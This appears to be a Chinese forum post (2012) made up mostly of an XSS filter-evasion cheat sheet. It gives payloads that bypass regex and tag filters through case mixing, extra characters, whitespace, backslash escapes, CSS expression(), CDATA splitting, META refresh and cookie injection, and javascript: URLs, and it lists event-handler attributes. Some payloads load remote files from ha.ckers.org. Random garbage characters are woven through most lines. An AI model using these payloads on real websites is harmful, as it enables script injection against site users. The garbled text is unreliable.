1. 改变字符大小写
2 b8 T/ e2 l8 o5 I
" @; I1 d5 W' N
: D- n* D' V2 K! B/ x# j- f+ v) g @0 [) J( [" H
<sCript>alert(‘d’)</scRipT>. y" N1 L- e+ z5 z
' M8 h1 v2 r2 g0 E- [ n# o2. 利用多加一些其它字符来规避Regular Expression的检查
4 K1 R" G4 n) m d% L. g) E+ [( p- m: e! |8 o0 d5 `
<<script>alert(‘c’)//<</script>& j8 [- P1 n( r1 r! e. z
8 _; a1 _4 X* p# S% F$ y3 N
<SCRIPT a=">" SRC="t.js"></SCRIPT>
2 D; ^7 @' r2 ^1 n6 ]
4 l h* _% |5 f: o" E" W: A( w' D <SCRIPT =">" SRC="t.js"></SCRIPT>
. g( S9 P# n8 L' u8 u4 O3 W2 E: e: ~4 Y$ f' W
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>: g4 s, ]: m/ g8 c3 J/ ^
7 m, T% [2 F, j! G- a <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>/ l& U( n* `2 R6 X
3 x& g( I- N) X- b
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
/ c" l' K# f! x3 [3 \3 O
# m' N5 a9 @2 x: b <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
3 F w& ~6 Y( y f6 `, h. x
% `8 Y# D- e. i- p3. 以其它扩展名取代.js& }' r/ w$ ~+ S1 K! `8 ?
: } R6 A7 {8 y
<script src="bad.jpg"></script>. X" b R3 [$ j ?8 P5 j
: A( o0 f& X x, J: q4. 将Javascript写在CSS档里7 j; x# ^: y6 j; I
- t! g! E6 Z5 }: v, @ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">, Y3 w3 b( J9 D5 {+ B, Z, Z5 o6 g
; |1 e8 v& {8 w. Z
example:
9 ]' {" h& U5 D3 R$ n; o2 Z. Q& D' V# o1 H' o3 O: ~
body {5 ~' v" k v$ X( T4 ]5 Z9 S
* y) @, V3 b5 i& u* p
background-image: url(‘javascript:alert("XSS");’)
4 T. p, E. t6 O0 t' \
: c( t% ~) z; ] } P" Y1 g2 \8 i. t1 k
# F' W [" r. h+ u
5. 在script的tag里加入一些其它字符
L. k# i9 j- b6 A! c
& U& ?, v3 L& T5 f; M, Q7 K+ r <SCRIPT/SRC="t.js"></SCRIPT>. L" q& N4 {$ q& F' e/ C6 J; h
`3 ?+ H" h) K <SCRIPT/anyword SRC="t.js"></SCRIPT>
1 I. y; ?/ e; e# W* T; P% U1 n$ F( a) F# q8 e
6. 使用tab或是new line来规避7 n7 I$ y2 V* }9 q
. `4 g, h7 o% { <img src="jav ascr ipt:alert(‘XSS3′)">
* ~% o! }4 b4 g. g5 Y! p6 m# ?
8 s, G5 M/ C( Q% C. ^+ ] <img src="jav ascr ipt:alert(‘XSS3′)">
( }) ]/ z5 J% C+ P, R; G* {, }
! O: L* r3 G, _* e0 Z <IMG SRC="jav ascript:alert(‘XSS’);">
3 W7 ~% j% A. M" i9 i; ]2 G a1 d; ~! b
-> tag, R0 M( E: \% U; k4 f8 d; U! n S
8 i, h! a* b5 d; x8 w' a3 Z X- k -> new line% F1 N" F4 W% g" j8 N2 R+ n% n2 |
3 \, O) l) e$ ]& Q
7. 使用"\"来规避
2 T# V0 N; ], A+ [# G" R9 o1 `) }% w6 ~6 ^' i1 L% g) ^* N
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>- \* k4 f0 w% s
* A5 D( W0 |8 `. b# c3 t
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>+ z% b- q( }4 D l+ @
, j2 k7 m# W7 Q <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
5 ?6 t' g0 s' q- u
5 t' ^/ y; \* z+ E, x' i# s <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 K% U1 h+ J& r$ l8 R$ I0 y0 h: D2 W) C# x. `' s
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
$ {4 r3 q5 w6 V' U+ y$ E
9 k: t* C* P/ |- U/ O8. 使用Hex encode来规避(也可能会把";"拿掉)3 l2 {- p% ^3 B7 l
5 c: j' a5 }8 ]1 d% Y <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 f! e! G5 ^4 L* m5 P2 i* Y o
4 r7 T3 s7 g9 s
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' Y, ^6 q* w# h
6 `: s4 r. E- {6 g; ]. H6 |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
' h4 e# Z \! X6 t4 h) y& b; u% W9 Y( } J# ?0 w8 u
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( t. o6 b$ m$ W9 ]- Q1 Q% |: T
( [! l4 @, R+ X ^8 K, O, P& q) W9. script in HTML tag3 L5 p: r$ Q* c' c+ W: X
7 `& P$ k6 A3 |9 } <body onload=」alert(‘onload’)」>6 j4 X$ E3 b* y. J! U
* H/ ?# Q1 i9 F) ^# {/ v onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
2 n6 y4 K4 H& d; \0 C, v
" s7 @8 p1 g- T10. 在swf里含有xss的code8 v( A4 `$ ~: L- Z( A
; u$ u$ |, |7 h
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
! D5 q/ r3 @4 F9 ` Z
$ L! Z9 M* f& a4 w" G$ T- ?, p11. 利用CDATA将xss的code拆开,再组合起来。
1 z% Q2 K* K% x* J# V. P! {1 g, W
9 d, ]) d* f+ a2 R/ j6 p% S <XML ID=I><X><C>
# ?3 B, _8 s8 ^* b0 \* t7 {
! V& r9 t7 Z# w8 X& k <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" w3 Z0 ^( z+ q
4 P# ^5 D$ h* k! @
</C></X>9 _1 B- g3 L( l* W$ W' `
% M8 r1 ^8 J# ]$ [0 L! n, P A- s </xml>* A% t+ T a% Q2 b! m4 m6 ^% W! U
& x8 [9 |. [$ V: v' [ <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
# W1 Q8 Q4 D( g3 M$ m
) u7 h4 l3 o! @8 B <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
* X" d: k/ G7 l# {/ N e
, W) q( K, L2 F& @1 r <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
& ^0 n9 v0 g" B8 q* F
4 _8 A, S0 P& V6 {# w3 f+ E' H12. 利用HTML+TIME。
* y& J8 a4 _& Z# e) l T: {# `: d' v, h! P0 Z
<HTML><BODY>
' W# E; K) x( V" t
. x" f/ ]7 ]8 D2 h <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">% k/ n5 ?) O' c# N3 o
: S* N4 ^* K) {# f4 f+ g8 m$ L1 v: k
<?import namespace="t" implementation="#default#time2">* R& V$ Z: f* A4 V
4 J) P' U) d5 Z5 j; T$ a5 Q& ` <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">% |$ E9 I% y* h3 b9 Y) w3 I& X
! L, j# `; I j0 q </BODY></HTML>
+ j p: z4 N7 S4 w) p! P) w9 j' S7 y
13. 透过META写入Cookie。# R6 J0 R A- H0 R2 g3 y6 k; f
5 {' Q, ^8 S/ z# e' r) o+ e <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">% I# |" N) F* V! _+ J2 Q
. i/ p4 F" C: M8 Q
14. javascript in src , href , url
/ } ]/ q' `/ E. f8 H ]2 ^2 L6 S2 x( Z1 ^6 v
<IFRAME SRC=javascript:alert(’13′)></IFRAME>* T1 D/ `2 E# r3 b
" Y# n* _# s @# N- K- }
<img src="javascript:alert(‘XSS3′)">. \. I( L9 X: I z
' l7 P0 T. H+ q5 B8 l. E' y
<IMG DYNSRC="javascript:alert(‘XSS20′)">; y# o" F; g/ {9 W& H3 J
& A* x- D& V% X- q0 d% `- }! M' S% P
<IMG LOWSRC="javascript:alert(‘XSS21′)">8 O& T) H: U: o0 u% F" o' f0 B6 F, n
/ j/ @; P* L: X7 |* ]8 | <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
5 R3 f! d2 z, H6 l" P0 [/ H& B. h9 P! t, P4 N$ O
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>. j& |0 v9 `) m, f
3 g6 N" H y8 ^1 N# \; `2 A
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">* y r% }% N* o( h1 t
" ^5 G) c- S' Y' }1 u7 K) D
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
, U( Y5 f$ z0 A& B1 o* `$ o3 y* a) ~5 t+ X& H
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}" }0 e/ F8 \5 o+ t/ b. ?
' k' e9 @+ ^4 \, [
</STYLE><A CLASS=XSS></A>; y% [8 O) w& z9 Q1 V
# U3 ~# B- L3 G; I
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
! S" E( z% N) e# u% v& X$ `+ \* ^6 a' o! p$ B2 H
|
发表于 2012-12-31 09:59:28
收藏
支持
反对